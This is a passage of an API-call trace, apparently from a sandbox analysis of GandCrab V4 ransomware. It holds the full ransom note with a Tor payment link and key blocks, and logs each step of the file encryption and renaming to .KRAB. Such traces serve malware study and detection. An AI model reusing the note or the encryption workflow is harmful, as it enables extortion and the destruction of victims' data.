(lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\jlwxnfqt\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x774 [0089.645] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0089.645] WriteFile (in: hFile=0x774, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e5a0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e5a0*=0x1f6e, lpOverlapped=0x0) returned 1 [0089.646] CloseHandle (hObject=0x774) returned 1 [0089.646] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.646] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0089.647] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x24, wMilliseconds=0x346)) [0089.648] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0089.648] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0089.648] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0089.648] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\d2ca4a08d2ca4dee3d.lock") returned 116 [0089.648] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\jlwxnfqt\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x774 [0089.649] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.650] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.650] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\") returned 93 [0089.650] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\*" [0089.650] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\*", lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0x10234f8 [0089.650] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.650] FindNextFileW (in: hFindFile=0x10234f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0089.651] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.651] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.651] FindNextFileW (in: hFindFile=0x10234f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0089.651] lstrcmpW (lpString1="5xxJMhf.ods", lpString2=".") returned 1 [0089.651] lstrcmpW (lpString1="5xxJMhf.ods", lpString2="..") returned 1 [0089.651] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\", lpString2="5xxJMhf.ods" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\5xxJMhf.ods") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\5xxJMhf.ods" [0089.651] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0089.651] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\5xxJMhf.ods.KRAB") returned 109 [0089.651] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\5xxJMhf.ods") returned 104 [0089.651] lstrlenW (lpString=".ods") returned 4 [0089.651] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0089.652] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ods ") returned 5 [0089.652] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.652] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\5xxJMhf.ods") returned 104 [0089.652] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\5xxJMhf.ods") returned 104 [0089.652] lstrcmpiW (lpString1="5xxJMhf.ods", lpString2="desktop.ini") returned -1 [0089.652] lstrcmpiW (lpString1="5xxJMhf.ods", lpString2="autorun.inf") returned -1 [0089.652] lstrcmpiW (lpString1="5xxJMhf.ods", lpString2="ntuser.dat") returned -1 [0089.652] lstrcmpiW (lpString1="5xxJMhf.ods", lpString2="iconcache.db") returned -1 [0089.652] lstrcmpiW (lpString1="5xxJMhf.ods", lpString2="bootsect.bak") returned -1 [0089.652] lstrcmpiW (lpString1="5xxJMhf.ods", lpString2="boot.ini") returned -1 [0089.652] lstrcmpiW (lpString1="5xxJMhf.ods", lpString2="ntuser.dat.log") returned -1 [0089.652] lstrcmpiW (lpString1="5xxJMhf.ods", lpString2="thumbs.db") returned -1 [0089.652] lstrcmpiW (lpString1="5xxJMhf.ods", lpString2="KRAB-DECRYPT.html") returned -1 [0089.652] lstrcmpiW (lpString1="5xxJMhf.ods", lpString2="KRAB-DECRYPT.txt") returned -1 [0089.653] lstrcmpiW (lpString1="5xxJMhf.ods", lpString2="CRAB-DECRYPT.txt") returned -1 [0089.653] lstrcmpiW (lpString1="5xxJMhf.ods", lpString2="ntldr") returned -1 [0089.653] lstrcmpiW (lpString1="5xxJMhf.ods", lpString2="NTDETECT.COM") returned -1 [0089.653] lstrcmpiW (lpString1="5xxJMhf.ods", lpString2="Bootfont.bin") returned -1 [0089.653] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0089.653] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1010df8) returned 1 [0089.654] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0089.655] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0089.655] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0089.655] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0089.655] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0089.655] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.656] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x10113d0) returned 1 [0089.657] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0089.658] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0089.658] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0089.658] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0089.658] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0089.658] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.658] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1011678) returned 1 [0089.660] CryptImportKey (in: hProv=0x1011678, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x10235f8) returned 1 [0089.660] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0089.660] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0089.660] GetLastError () returned 0x0 [0089.660] CryptDestroyKey (hKey=0x10235f8) returned 1 [0089.660] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0089.661] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1010e80) returned 1 [0089.662] CryptImportKey (in: hProv=0x1010e80, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x10231f8) returned 1 [0089.662] CryptGetKeyParam (in: hKey=0x10231f8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0089.662] CryptEncrypt (in: hKey=0x10231f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0089.662] GetLastError () returned 0x0 [0089.662] CryptDestroyKey (hKey=0x10231f8) returned 1 [0089.663] CryptReleaseContext (hProv=0x1010e80, dwFlags=0x0) returned 1 [0089.663] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\5xxJMhf.ods" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\jlwxnfqt\\5xxjmhf.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0089.663] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0089.663] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0089.664] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0xb82b, lpOverlapped=0x0) returned 1 [0089.701] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xffff47d5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.701] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xb82b, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0xb82b, lpOverlapped=0x0) returned 1 [0089.701] WriteFile (in: hFile=0x7ec, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0089.701] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.705] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.706] CloseHandle (hObject=0x7ec) returned 1 [0089.706] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.706] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\5xxJMhf.ods" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\jlwxnfqt\\5xxjmhf.ods"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\5xxJMhf.ods.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\jlwxnfqt\\5xxjmhf.ods.krab")) returned 1 [0089.717] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.718] FindNextFileW (in: hFindFile=0x10234f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0089.718] lstrcmpW (lpString1="6tazTl7G4e-N19_.xls", lpString2=".") returned 1 [0089.718] lstrcmpW (lpString1="6tazTl7G4e-N19_.xls", lpString2="..") returned 1 [0089.718] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\", lpString2="6tazTl7G4e-N19_.xls" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\6tazTl7G4e-N19_.xls") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\6tazTl7G4e-N19_.xls" [0089.718] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0089.718] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\6tazTl7G4e-N19_.xls.KRAB") returned 117 [0089.718] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\6tazTl7G4e-N19_.xls") returned 112 [0089.718] lstrlenW (lpString=".xls") returned 4 [0089.718] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0089.719] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".xls ") returned 5 [0089.719] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.719] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\6tazTl7G4e-N19_.xls") returned 112 [0089.719] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\JLwxnfQT\\6tazTl7G4e-N19_.xls") returned 112 [0089.719] lstrcmpiW (lpString1="6tazTl7G4e-N19_.xls", lpString2="desktop.ini") returned -1 [0089.719] lstrcmpiW (lpString1="6tazTl7G4e-N19_.xls", lpString2="autorun.inf") returned -1 [0089.719] lstrcmpiW (lpString1="6tazTl7G4e-N19_.xls", lpString2="ntuser.dat") returned -1 [0089.719] lstrcmpiW (lpString1="6tazTl7G4e-N19_.xls", lpString2="iconcache.db") returned -1 [0089.719] lstrcmpiW (lpString1="6tazTl7G4e-N19_.xls", lpString2="bootsect.bak") returned -1 [0089.719] lstrcmpiW (lpString1="6tazTl7G4e-N19_.xls", lpString2="boot.ini") returned -1 [0089.719] lstrcmpiW (lpString1="6tazTl7G4e-N19_.xls", lpString2="ntuser.dat.log") returned -1 [0089.720] lstrcmpiW (lpString1="6tazTl7G4e-N19_.xls", lpString2="thumbs.db") returned -1 [0089.720] lstrcmpiW (lpString1="6tazTl7G4e-N19_.xls", lpString2="KRAB-DECRYPT.html") returned -1 [0089.720] lstrcmpiW (lpString1="6tazTl7G4e-N19_.xls", lpString2="KRAB-DECRYPT.txt") returned -1 [0089.720] lstrcmpiW (lpString1="6tazTl7G4e-N19_.xls", lpString2="CRAB-DECRYPT.txt") returned -1 [0089.720] lstrcmpiW (lpString1="6tazTl7G4e-N19_.xls", lpString2="ntldr") returned -1 [0089.720] lstrcmpiW (lpString1="6tazTl7G4e-N19_.xls", lpString2="NTDETECT.COM") returned -1 [0089.720] lstrcmpiW (lpString1="6tazTl7G4e-N19_.xls", lpString2="Bootfont.bin") returned -1 [0089.720] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0089.720] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x10110a0) returned 1 [0089.722] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0089.722] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0089.722] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0089.722] CryptGenRandom (in: hProv=0x10110a0, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0089.722] CryptReleaseContext (hProv=0x10110a0, dwFlags=0x0) returned 1 [0089.722] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.723] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1011898) returned 1 [0089.724] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0089.725] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0089.725] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0089.725] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0089.725] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0089.725] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.727] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x10112c0) returned 1 [0089.728] CryptImportKey (in: hProv=0x10112c0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x10231f8) returned 1 [0089.728] CryptGetKeyParam (in: hKey=0x10231f8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0089.729] CryptEncrypt (in: hKey=0x10231f8, hHash=0x0, Final=1, 